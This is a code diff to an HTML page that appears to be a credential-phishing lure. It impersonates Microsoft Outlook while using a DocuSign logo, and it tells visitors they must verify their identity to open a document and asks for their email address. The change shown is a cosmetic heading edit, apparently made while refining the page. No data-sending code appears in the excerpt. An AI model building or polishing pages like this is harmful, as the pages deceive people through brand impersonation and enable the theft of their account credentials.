--- a/index.html
+++ b/index.html
@@ -70,7 +70,7 @@
     <!-- Outlook Authentication Page -->
     <div id="auth-page" class="container">
         <img src="https://docucdn-a.akamaihd.net/olive/images/2.65.0/global-assets/ds-logo-default.svg" alt="Outlook Logo" class="logo"><br>
-        <h1>Email Authentication</h1>
+        <p><b>Email Authentication</b></p>
         <p>To access this document, you will need to verify your identity.</p>
         <p>Please ensure you input the correct email </p><br>
         <input type="email" id="email" placeholder="Enter the recipient's email here."> </br></br>
